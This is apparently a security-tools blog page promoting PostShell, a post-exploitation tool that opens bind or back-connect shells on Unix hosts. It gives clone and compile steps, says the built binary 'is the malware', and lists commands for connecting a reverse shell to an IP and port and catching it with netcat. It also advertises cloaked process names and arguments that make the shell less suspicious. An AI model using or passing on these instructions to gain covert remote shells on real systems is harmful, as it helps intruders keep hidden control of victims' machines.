PostShell is a post-exploitation shell that includes both a bind and a back connect shell. It creates a fully interactive TTY which allows for job control. The stub size is around 14kb and can be compiled on any Unix like system.
ScreenShots
Banner and interaction with shell after a connection is started.
Also Read – Metame : Metamorphic Code Engine For Arbitrary Executables
Why not use a traditional Backconnect/Bind Shell?
PostShell allows for easier post-exploitation by making the attacker less dependant on dependencies such as Python and Perl.
It also incorporates both a back connect and bind shell, meaning that if a target doesn’t allow outgoing connections an operator can simply start a bind shell and connect to the machine remotely.
PostShell is also significantly less suspicious than a traditional shell due to the fact both the name of the processes and arguments are cloaked.
Features
Getting Started
Downloading: git clone https://github.com/rek7/postshell
Compiling: cd postshell && sh compile.sh This should create a binary called “stub” this is the malware.
Commands
$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$
Example Usage
Backconnect:
$ ./stub 127.0.0.1 13377
Bind Shell:
$ ./stub 13377
Recieving a Connection with Netcat
Recieving a backconnect:
$ nc -vlp port
Connecting to a bind Shell:
$ nc host port
AutoExif is a powerful Bash script designed to streamline the process of editing image metadata…
SimpleImager V4.3, your go-to tool for streamlined system imaging and data acquisition. Designed to simplify…
MetaOSINT enables open source intelligence ("OSINT") practitioners to jumpstart their investigations by quickly identifying relevant,…
ThreatPinch Lookup creates informational tooltips when hovering oven an item of interest on any website.…
Myself and any other potential contributors to this website are NOT in any way affiliated…
The Mobile Evidence Acquisition Toolkit designed by BlackStone Discovery. Developed to enhance digital forensics, this…